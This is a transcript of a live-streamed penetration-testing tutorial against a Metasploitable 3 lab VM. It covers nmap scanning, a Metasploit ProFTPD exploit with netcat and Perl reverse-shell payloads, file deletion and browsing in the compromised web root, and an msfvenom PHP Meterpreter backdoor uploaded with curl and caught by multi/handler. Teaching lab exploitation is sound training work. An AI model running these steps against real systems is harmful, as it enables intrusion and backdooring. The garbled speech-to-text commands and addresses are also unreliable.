All right, welcome to episode number 59. All right, so give me 1 second. All right, okay, boys, girls, we are here live again. All right, so while we are doing this, and I will go ahead and open my Discord channel. Okay, so okay, so as well as loading. So let me go ahead and review yesterday, whatever we did, right? So yesterday we went over different types of technique, different types of tools, different types of information gathering, all those fun stuff, right? So today we will go ahead and do the same thing but different way. So what I'm going to utilize today is more likely using the MSF console. So MSF console itself is the combination of tools like automation tools, right? I keep repeating the same thing. So I do have Kali Linux. I do have Metasploit 3 table, which is vulnerable, the collection of vulnerability. And that was, that was published already on the internet. So that's what I downloaded, and I am going to demonstrate to you guys to help you to build your career in cybersecurity and any kinds of certification. And again, if you are looking for any kinds of trainings, or if you're looking for any kinds of one-on-one sessions, or if you think I can help you to your business, I can, do the counseling as well. So the counseling is consultant services we have that, however, we can do a lot of things, right? So with that being said, today I will go ahead and overview everything, whatever we did yesterday, and I will go ahead and do MSF console, the automation. So like we did manual and we switch over to like MSF console. So but today and then the coming sessions, maybe 2 or 3 more, so we will continue with that, the same information with MSF console. Okay, so that means I do have the web page as well if you want to go. So, and also it's scrolling down over there, so you can always go to spycyber.us. And again, so I believe on the information, right? So there's like a pop-up banner there. You can go back and visit that. And I also have the digital marketing services, and I do also have the application that you can fill out, and then I'll contact back, right? So, and all those details are, you can fill it up if you want it. And also, if you want to contact me, you can go back here and fill your information, and then I will get back to you. So, and then also I do have all those YouTube channels there, so you can come back and so if you go to the channel, so I do have a lot of videos there, so you can you can go over to it. So right, so it's loading right now. Let's wait for a few more minutes or maybe seconds. So let's see how it goes. Okay, so now you can see this is the web page for like the page for Spycyber, and there's like you can find a lot of information here. We do have web page, we do have TikTok, Reddit, Twitter, LinkedIn, Facebook, GitHub, Discord, and all those fun stuff. So you can go ahead and check that out for me if you want it. But in the meantime, yeah, so I do have a lot of video if you go over this one. And Yeah, there's like tons of videos, so you can take advantage. So this is the new release. If you see it, this is the new release. There's like a um, almost like 2 hours session, so you can get beginning and then the end of the sessions. But it is not full video, but I'm continuously making those videos as well. But in the meantime, make sure that we do have. And also, if you go to live sessions, you can find a lot of videos, right? Some of there are members, some of them are for public, so we can go ahead and visit them, and you can put the comments there, how you feel it, how you like it or not. So we will go from there. Okay. All right, so now what I'm going to do today will be, so yesterday we went over to the Nmap, right? So Nmap is the tools where you can scan the network or find the different types of vulnerability from that. But you need to know that the Nmap tools, let's say for example you have tools but you don't know how to use it. That could be the problem, right? So you need to understand you can use that tool for your purpose, right? So purpose, like I will say, like proper. So if you have tools and then you don't know how to use properly, then that could be a problem. So that's what I'm here to help you, to give you all those tools, details, and all this fun stuff for myself, for you, and then help me to grow. Okay. So if you are new to this channel, go ahead and subscribe, like, and share. And I'm more than happy to help you. Okay. All right. So with that being said, what I'm going to do is let me go ahead and open the Discord channel. I believe I opened it, but it does not like me. So let's see. Anyway, so while it's loading, so what I can try is, so let's see. Yesterday we did, since this is the IP address for 154, so I also, have the 192.168.35. And also I already saw you guys yesterday. If you don't know how to, make sure that it's our same network, so make sure that you watch the previous yesterday's video and you can get more information on clarity. Okay. So, and if you go a little bit further down, I also ran the SVSC. So like I mentioned, so SC is the services and the version, and SC is the synchronization, right? You go back and connection back and forth, and you have the handshake. So handshake is more likely say hello, and you guys respond to me hello, and then you acknowledge, I acknowledge. That means that is a good handshake. So I know you're coming, and I know you're coming, and you know me coming. So that will be the good session, right? So that is the handshake. So, and we also did a couple of things, right? So if you go a little further down, we found the port 21 is open for FTP, port 22 is open for SSH, and we will try to find any kinds of vulnerability they have, and you can try that. And also, port 80 is the TCP, which we have here, and we did 445. We also tried to scan yesterday with the Samba, but we did not get a lock, so we will continue to do it today as well, or maybe coming sessions. And then we do have 3000, all those fun stuff, right? So just watch it there. And then SMB2, clock skew, SMB discovery, and all those things, right? So, okay. So what I'm gonna do today will be, let me go ahead and do one more thing, guys. So, very interesting. I don't know why I'm not able to see my Discord channel. So let me go ahead and check my Discord channel. Why it's not loading? So, Discord is supposed to run, guys. Let me check. Yeah, because I just want to, again, so I want to give you guys information, communication between you guys, because I like transparency. If I go live and people don't know, that will be maybe they miss it. So I just want to make sure that choice is yours. But if my responsibility is to provide you and guide you through that. So, but I will wait for that, and then I'm gonna kill that session for Discord. Where is it? Discord channel. Let's see, where is it? Okay, so let's try to open the Discord channel one more time. Hopefully it will load. Okay. Okay, it's not loading. Interesting. So what I'm gonna do is let me go ahead and kill this session and reload it one more time. Okay, it's not loading one more time again. Oh, there you go. Okay, anyway. Yeah, sometimes like, sometimes it's crazy. So anyway, so what I'm gonna do today as well will be the first step, right? The first step, what I'm gonna do is, this is my IP address, and I'm gonna a little bit change here. So remove this SC, and dash P is port, and 0 is the 0 to 6 5 5 3 5 is the up to there, right? 65,535. So it will scan all the way to 0 to that. So the first step will be, I mean, you can, if you wanted, you can just also do the sudo. This is the more, like more like authenticated, so escalation kind of thing. So type your Kali password. Mine is different, your might be different. So okay, so and then we will wait that, right? So and then in the meantime, we do have, like I mentioned, I do have the Discord channel, like I mentioned earlier, and so you can do go to join the Discord channel as well. And let's see, I'm gonna copy this and paste it. Okay, and hit enter. Okay, we are done there. So, and then let's wait for a couple of more minutes, and then we'll find more information and we'll go from there. Okay, and again, so feel free to ask any questions if you have. If not, then we'll move forward with the information that we gathered. Okay, so and then keep it easy, right? So what I like to do is put that information here as well. Let me put in the chat. So let me put in the Twitch chat as well. In chat. Okay. And I will also put in this chat. Okay. And yeah. Okay. So, and also I'm going to move to this one in the chat session as well. Okay. So let's go ahead and put this chat here, and you can see, interesting, why I'm not pasting, bro, maybe too much. Okay, anyway, so we will see. Okay, anyway, what I can try now is, this one is a little bit, yesterday was a little bit more detailed, and today will be, because I'm just using the service version, so that's the reason it does not give you full blown of the information. So that's the reason you need to make sure you need to make your decision to how you can scan the information, right, while you're gathering. So, and then we know that this is the Metasploit 3 table, and we know this is the port 8080 and all those things. You can see port 21, port 22, 80 for 5, all those things, because those are the same information if you go a little further down, sorry, a little bit up. So if you see without dash s lowercase and s uppercase, c is different, right? So it is more towards the double check, right? So that's what I mentioned you like earlier in my video. So it will check the like back and forth, right? So back and forth is more kind of, handshake, like I mentioned earlier. So those are the things. And what I'm going to do first is I'm going to open my MSO console. So since we know that these are the lot of port that we have open, right? So if you see this is the port 80, if you do port 80, so you can see like different types of folders and pages, all those, because these are the tested we did it. So we were able to successfully, put and write the information which we tested. I can also show you because last time we already did it, so you can do that too. But in the meantime, you have to check my last video as well, because I'm referring to my last video a lot of time because we already went over this one. So what you can try now is, let me open the new terminal. So new terminal is here, and oops, not that. So what I'm gonna try is, if you see this one right here, and I just do that because these are the two, like I mentioned, these are the two of them, and that was tested by us without password, and those are the by default on the index file. Okay, so and also if you're looking for Active Directory Pentesting with a Kali, this is a completely practical video, and you can go to Udemy, you can buy it, right? If you want my discount code, let me know and join the Discord channel, and I'll provide you there. Okay, so yeah, you can go back there, and then you can refresh. Let's see, there are like a 46, I believe, 1,146 people are there. So like there's a 4 ratings, and I'm again, so if you buy the course and if you put the review how you feel it, that would be appreciated, because this is the real world, because I'm not putting any kinds of theory here, to be honest with you. I'm just putting the real world attack. And then also you can download the OVA file, which is for the virtual machine. You can directly upload, and then you can start trying. And also I also provide the step-by-step guidance for how you can set up the lab, or if you feel like I don't want that in lab, well, you can just import the OVA file and then you can try it. Okay, so I'm not pitching you to buy the course, but it's really up to you. That's your choice. I'm not forcing you. Anyway, so but there's like a lot of free video on the YouTube. You can always go ahead and watch it. Anyway, so the other thing, let's go back to, oops, not that. Let's go back to the lab and then come back here. So let me open the new terminal. And once you open the new terminal, here is what you can try. You can try to do so sudo msf console. So msf console, like I mentioned, keep repeating the same thing and over. So msf console is a combination and the collection of automation tool, right? So you have to choose your tools which work for better. If you don't choose the right tools, and it may get frustration. So I provide you guys the information, ask the questions, whatever feel it, and go ahead and like and share. All right, so the first step, right? So I'm completely focusing today with Metasploit, Metasploit, the framework. So Metasploit is the combination, like keep repeating the same thing, right? The combination of the tools. So the first thing what we found is, and also I do have territory, like I mentioned, I put any kinds of information that I feel, okay, this might be helpful, so I put it here. So it's up to your choice, right? So I don't want to force you, and then I don't want to provide you any kinds of tools that you don't feel comfortable. So All right, so now what I'm gonna try is, let me go ahead and copy this. So this one right here, okay? So, and we can do search first, and you can type or paste it, the pro ftpd, right? So this is the very important part. So you need to choose the right one. So which one works for better for you? So I believe 15 is the choice for me, and but you can try different things, right? FTP Pro, as replace, and or you can try to do so exploit this one, but you know you can try definitely with the different tools, but I can try 15. So by the way, you can use like 15, or you can just copy, you can copy this directly and paste it here. So however feel you comfortable, so that will be. So if you also see right here, use 16 or info 16, you can do this one as well, or you can do info 16. So that will be give you the details for that, right? And this will be better. So now use 15 or paste it here that we copied earlier. Okay, so hit enter and you are in there, right? So again, so you can do info here as well if you want more information again, but if you don't want that, up to you. And you can do like show options is crucial here, because we need to know what exactly information we need to put over there, and we will give, it will provide a good result. If not, then we will be, you know, get the worst thing. So boy, yeah, let's go do one thing here. So the first thing we will put the R host, because R host is required, which is remote host, is our Metasploit 3 table, and the IP address that you guys need to put it here, right? The first thing we will go over to set R host, and which is 192.168.35.154, and hit enter, right? So that is the first step. So options one more time, and make sure that it is set, and okay, it is set. And then let's go to use the site path. So site path, like I mentioned, right? So the site path, you can use any kinds of site path, because I believe this is the HTTP, and we need to make sure that is on inside the bar www /HTML, so because this is HTTP. Okay, so let's go ahead and shed the site path. So what I can try to set site path, and you can do, so you can do var www and HTML. Okay, hit enter, and so I believe that should be it. I don't think anything we need to put it here, because let's do show options and hit enter. So we don't need proxy, we don't need cport, chost, whatever it is. We only care about the R host, we only care about the site path, we only care about the port, we only care about the temporal path, and SSL. I don't need that, because remember, if it says required, you need to put everything. If there is a yes, you need to accept. Okay, so whatever you feel comfortable. Okay, so that means you can do CMD Unix netcat. So by default, that should be not our case, but we can try it. If not, then we can change the payload as well. So let's try first. Okay, so run. Okay, so let's see. If not, then we can switch to different one. Okay, so I mean there is the open already, the session is open. So I will also show you how we can switch back the sessions and you can try the different way. Okay. Okay, so it created, right? So now we can go to sessions and you can find that. Or you can do sessions dash one because that's sorry one, right? So because this is the ID, you need to go there. And then the other way you can try it is do show options. Now we have one session, right? So we can try to do the payload option different, right? So what we can try is, so let's go ahead and do payload. Set payload. You can try to use, I mean, you can do like show payload or whatever. So you can do and find which work for better for you. And you can do CMD and you can do Unix and you can do reverse Perl. Okay, and then you can there so options and you can see that options. Now we put this one right and yeah, everything is fine. So we are not changing anything here. We're not changing anything here. We're not changing anything here because we're only focusing 21 ports, sorry. So because the reason we did here is the we searched for the FTP, right? Here we go. Yeah, so we search for the Pro FTP. So that's the reason we are focusing to port 21. Okay, so now we do have one session already. We will try one more to do the same thing. Okay, so we can do run. We are just changing the payload options, nothing else. So it will be more complicated, but in the meantime, you have to understand like which one is like good session for you, which one is the bad session for you. So if you see right here, there's a 2 open session already. And if you go a little further up, there's a 1 session open, right? So now we are on it. So let's try ID here. Yeah, this is the good session because you know it was open and it was killed that session because it was not the completed sessions that was created. However, it was in the background. So it says exploit abort due to the failure unknown digit this is the excluding payload. So that's the now we have full blown of the ID here. So you can also do if config maybe IFA, right? Okay, if not, then if config. There we go. So now we have 54 IP address on it. So, and then also we can do who am I? I'm double dash data. Okay, so yeah, this is the one of the great example, guys. I believe you guys are enjoying. I believe if not, then if you have any questions, feel free to put in the chat. Okay. So we are almost 30-minute session here. So my goal is to provide you an hour session. So, and I will come back on Saturday and Sunday. So from 10:30 a.m. to 11:30 a.m. Pacific time. The Pacific time is Californian time. So if you are watching from different country or region or whatever it is, so feel free to convert that time, and then we are here for fun. Okay. Okay. So that we have this one. Now we can also do help. I don't know if help. So help is there, right? So which is now you can do cell. So what I can do is I need the full blown of cell. So we can try that. So let's try to let mention like you can also put this one in the background. You can switch over to a different one. So you can also upload the file, you can do sources, all those things, right? So but I'm more interested with the cell. So cell, you can try that. Now you are full blown of reverse cell interaction here. Okay. All right. So Mm. All right, so let's wait for the full blown of cell here, and we will move forward with the Apache server. So once we are done here, okay. So yeah, I mean, this goal is really, you know, I personally I like the organization because how you have to make sure your own sessions to trigger yourself, right? Because if you don't focus on the different technique, and if you uh, like in the real world, if you don't try the step-by-step guidance, that will give you or trigger yourself like the SOC, the Security Operations Center, they will find you, trigger you, and they once they are trying to monitor everything. So you have to be very careful. Okay. So in the real world, so you have to be careful. And now you have the full blown of the cell here. You can do ls here, right? You can let's try to remove this two of them. rm remove, and that's force test dot php. Okay, so it doesn't like maybe. Oh, yeah, it is gone. All right, do one thing one more time. So rm force test txt. I mean, you have full blown of read write access, so which is really fun. Now you can go inside the cd php my admin, and we can find, let's see. Okay, let's see now ls ls minus l list, right? So you have read write access to this one. This is cool, right? And now you can change the database you have. There's a created PHP database. Everything is here. So you have examples. This is a folder, and this is also folder, and you can do whatever you wanted. Okay, so let's go back a little bit, right? And then do ls one more time. Ls minus a, you can do la, or you can do ls minus l, so which will be the list, right? And now you can do cd chat. So ls, and now we have log html, read log.php, that's the css. I mean, which is good. Let's go back to the home directory then. Let's see if there's any kinds of information here in www data. Okay, so that means you have cag bin html log.html. What if we do cat log.html? Okay, so nothing. Okay, so let's go back again. So let's do ls here, and I mean we literally we have access, guys. So ls cd logs ls minus l, and you know there's like log. So let's see which log is the latest. So this one might be the new one. So Apache log, yeah, authentication log you have here, and installer, this is the folder, and syslog. Okay, so let's go to syslog then. Okay, so cat and syslog. Okay, okay. That is interesting because he says the permission is denied. That means we need a more privilege escalation, right? Right, so that is cool. What if we do cat mysql.log? Okay, all right, so yeah, I mean, logs are not there, but if you see, we are as www data, but these are more kind of root, so we might need to root permission to do this one. So okay, so syslog.html. Okay, so that's fine. So what I can do is to go back Go back one more time and do ls here. You have more information, guys. So we can do cd user, oops, okay, ls, yeah. So yeah, so this is home, I believe. Okay, so or if you want to go more further, so you can do set no set host. Okay, so home is not set, so that's fine. So what we can try now, we can exit from here and we will move forward with the Apache server. Okay, so let's go ahead and exit both of the session. So you can kill the session, or you can exit here, okay, and exit from here. So let's see. We can do Control C, and yes, I want to control all this clear, and I will clear this. Now what we can try is Apache, right? Because our goal is to find Apache, right? So this one, okay. So I will go back to no, like 22 port later on, okay. So let's go to search for the Apache. Search Apache. Okay, so let's find out the like 318 trigger. Like let's filter it out, right? Apache search. Maybe we'll try to find search Apache. Maybe grip. Okay, it doesn't like that, the grip. Okay. So Apache mode. Okay, it doesn't like. So that we can try is Apache underscore mod. Right? So that's like a more clear, right? Okay, so now we will go ahead and do, I believe this should be, we can try both all of this, but let's move forward with the one first, right? So use one, I can go back this way, and you can do info, whatever you wanted, right? Or you can do so options, and we need to set some of the options here. So the first thing, the CVE file should be by default, right? So this is the default. Those are vulnerability for the CVE file. So, but in the meantime, we can try differently, right? So let's put the R host first. Set the R host 192.168.35.154, and what else we need to set? So so everything should be fine. Our host is done. Certificate, we don't need that. Yeah, SRV host is a local host, so we don't need that because this is by default. Port 88 is fine. Target URI. So target URI, let's try to find something because we know that the CGI bin is there, right? So what we can try is set the target URI. So target URI is CGI. Remember, we will have access to that, and then we were able to see the CGI bin, right? You can try hello underscore world .sh. So if you think how I can find this, you have the access to the previous version, which we have already did, right? So we can try that, and you can now do so options one more time to confirm everything looks good. So SSL, I'm not putting any kinds of SSL certificate here because we don't need it. And the R path is the bin, so we need to define that bin. And proxy, we don't need that proxy right now, but we will change if we need it. And vhost URI path, we don't need that. and timeout. So timeout is more important. So while you're trying to do is 5 second is timeout, but you can change to 3 second, 2 second, whatever is works for you. Okay. So everything is set. This is on lhost, which is listening, which is our cal machine IP address. And then this is the L port, which is 444 is the default. So you can change it later on, whatever you want it, but it's your choice, right? So, and then the payload we are using is the meta persistent reverse TCP. Okay, so that means we'll try to find if we have more privilege escalation than the last user. Okay, whatever we did. So everything should be fine here. I'm gonna run, right? So run, and let's see how it goes. Let's wait for the command is staging the command, but no sessions. Interesting. So what we can try the different. Okay. So HTTP Apache mode CGI mass environment exe. So let's see how this one is different. Okay. Our port is that, and yeah, let's try it. Let's try it. So that's fine. We can try that. So let's try one more time to run. Okay, so let's see. Done. There is nothing still. So sessions. Okay, so that session need to be killed. So I don't need that session. Okay, so kill one. Session kill one. Okay, so now I can need help, obviously. I'm gonna kill that session because I don't need our host this session key K1. That's K1. Right? So okay, so now that it's closed, the no more sessions. Okay, there is no sessions, and let's try to run. Yeah, we can try different ones, so no problem there. Okay, so let's try to do so options. Okay, so let's see. So port 88 is there, and yellow host is there. So API bin world.sh. Okay. So let's see. If not, then I can try one more time. All right, so let's try to do is All right, so now we will go ahead and do, if that doesn't work, so we move forward. We're not wasting our time there, so, okay. All right, so now what I am gonna do here is, let's try one more time. And let's try to do, supposed to work. I don't know what happened, but yeah, that's fine, whatever. So no problem there. So let me do one thing one more time. And so CMD, that is fine. So I can do site path. I don't need that site path. Target URI. So let's do set the tar get URI and paste it. Oops, not that. So let me go ahead and type it. CZI dash bin, where we have to go and type the hello underscore world dot sh. Should be fine. Okay, it doesn't like. Okay, so that's fine. So let's move forward. So again, so you don't have to waste time if it doesn't work for you. Just so don't worry. Okay, yeah. So let's go to that then. What we can try is, let's do the MS Venom, right? So MSF Venom, and you can try dash P is path, and PHP, and Metapiter, and reverse TCP all host is equals to 9.2.168.35.154, and L port 4444, and you have to asterisk where you want to go is whatever you feel comfortable, so put it there, so no problem there. So I will put home Cali and here, so it should be backdoor.php. So I'm exporting that to the backdoor.php. I'll make more sense to this one is 192.168.35.154. I mean, whatever it works for you, you can put it there. But you can try differently. But I like the organization. So okay, so hopefully this is the reversal. We are making the host is listening host. Oh, sorry, listening host is our IP address. So we can try this 144 and 144. So okay, so this is our machine. So if you like, where did you find the IP address? So if you do IF config, so this is our IP address for the Kali machine, right? Okay, all right. So and then you can hit enter. It will generate the file for you. So this is the backdoor file that we created, and you can use now. It is there, so I can do ls. Okay. So where is it? Backdoor. Right here, so it is there, and now we can do C URL is the X, and put, you can do put, and that's where you want to put that file is at home, and I do have in the Kali machine, right? So Kali, and I copy this one, copy it, and PSP. So I want to upload to 192.168.154.54, and this will be the same one. So paste it. Okay, so that's the destination. So this is the destination for the remote host. So we will see and we'll try different thing. Okay, so not found. Which one didn't find it? Okay. All right, so maybe we can remove das D. Okay, Kali home, Kali backdoor. Okay, the request URL didn't found on the server. Maybe you can put inside the upload, maybe. Right. Okay. So URL, put that there, and method not allowed. Method not allowed. So okay. So now address passy do port 80. All right. So now that's fine. If not, then we can try. It's supposed to work, but let's see. Backdoor 192. Yeah, 65. Upload that. Maybe we can try sudo. Let's try it. Sudo. Okay, let's see. Okay. Not allowed. It is not allowed. So what we can try then? Okay, so let's Google it. CURL command. Okay, let's see. And then we'll try it. So okay, so options here: URL, HTTP, local file, Okay, so L is that, and D. That's the what we are trying here. Maybe, you know, we can try HTTP, right? Okay, let's not implement it. Let's support it. And what else we can try? Let's see the commands if we have. Put command. So yeah, so this is what we have, right? So export, so which need to be uppercase. Okay, it doesn't like. Okay. Let's do it. Okay. All right, so now what I can try, the path to data. So that we have there, sending data from file. So you can read that symbol, that options. So H there. So let's see what we can find here. Uploads, right? Uploads. Here we go. Yep. So that is what I'm looking, guys. Yeah, the only thing was the missing is upload. So that's why, like you need to very, very careful. So yeah, so now we are able to done there. Okay, so now we will go ahead and do next time. So we are almost 57 minutes here. So what I can try, the last one is, let's do to the multi-handler. So we don't need that now because that was the argument that we're missing. So S that we tried upload, but it was S actually. So okay. Okay, so now what I'm gonna try is we put that information to the backdoor here. So now what I'm gonna try is, let's go back here, and I'm gonna search for the search multi underscore handle. Multi. Search. We can do handle. Okay, so here we go. So now we can try. There's a lot. Multi-handler right here. Okay, so use 51, and so options. Now L host is our listening host, which is set L host 192.168.35.144 is our listening host, right? And then the payload, we believe this is the payload that we need to change. So the set payload, which will be the PHP, because we create that PSP, right? So the PSP there, oops, PSP, and you have to meta and reverse TCP. So because that was generated, right? It's not valid. So this is the what we generated, and so that means, okay, so set payload TCP handler. Okay. So yeah, I want to see it. PSP. So this is CMD. Okay, so where is it? PSP. Windows. This is Windows. PHP right here, and reverse TCP. So that is one I'm looking. Okay. So now I'll just copy and paste it here. Okay, here we go. And do swaps one more time. And yeah, now it's a change. So that should be it because we already put it there, the location. So now run. So let's see how it is. Also, you can do C copy URL, and which is 192.168 and 35.154 and uploads, and that what we have here. Okay, paste and uploads. You can try that and let's see. Okay, there we go. So yeah, just keep in mind different types, but we'll come back and visit one more time on Saturday. So now we have 3 sessions open. We need to, make sure that we are not sessions. There are like more sessions. You can put that. So session ID, which is you can do it as I. So that will help you. And yeah, we need to interact that if we want it. So if you go background, so you put that background and you can do sessions and you can hit enter and you have ID 3 sessions. So this is not a complete 3 sessions, but there is one session which is ID 3. So if you want to go with the sessions, you can do 3, right? So now you have UUID. Okay, so this is the UID, and who am I? Okay, it doesn't like it, and you can do cell. So there will be more clear cell, so you can try that, the cell. So okay, all right, so yeah, you have more cell, right? So but you can try different things. I have config, I have A or IPA, right? Or config, no, IPA maybe. Okay, it doesn't like it. That's A. Okay, all right. So yeah, I mean, you can do help maybe. Okay, it doesn't like it. Okay. So yeah, I believe you guys enjoyed these sessions. I will come back and visit one more time on coming Saturday. So please go ahead and subscribe, like, and share. And that's how I go. If I go live, and then you will able to, watch that live sessions later on. So my goal is today help you guys to get the certification, and I'm here to help you to guide your career. So if you are new and you're completely looking for the cybersecurity stuff, I'm here to help you. So I do have web page here. If you go back, so you can go to right here. So you can go to apply now. You can fill that information. So and I will get back to you. The other one, you can also see my YouTube channel. I do have tons of video. You can go and watch there. I have 172 videos, and I do have the this web page as well, so you can find that information, and you can go to different channels here, and that's up to you. Okay. All right, so I hope you guys enjoy, right? So, and then if you want to contact me, I'm here, put in that information and then contact me. Okay. And also, if you're looking for any kinds of business collaboration, I can help you to do so. I can help you to, make sure that I scan the network and give you the overview for the posture of your cybersecurity. So if you're a small business, let's collaborate. Okay. All right. So yeah, I mean, also there's a, like Active Directory Pen Testing on the Udemy course. I can provide you. I already mentioned you about the where to find the Discord channel, and you can join the Discord channel as well. Okay. All right. So thank you so much for watching the session for today, and I really appreciate it. So yeah, don't forget to subscribe, like, and share. That is my goal, right? So, and I also help you a lot of things with the career. Okay. And yeah, so let me put this one in the chat session as well, so you can go ahead and do the chat session. So spycyber.us. I mean, it is on the YouTube. If you go back in the click here, so you'll see web page, TikTok. I do have a lot of things here. So, but if you want to, get the working sessions, I mean, I'm open for that. So, okay. All right. Thank you so much, guys. I will talk to you and see you later.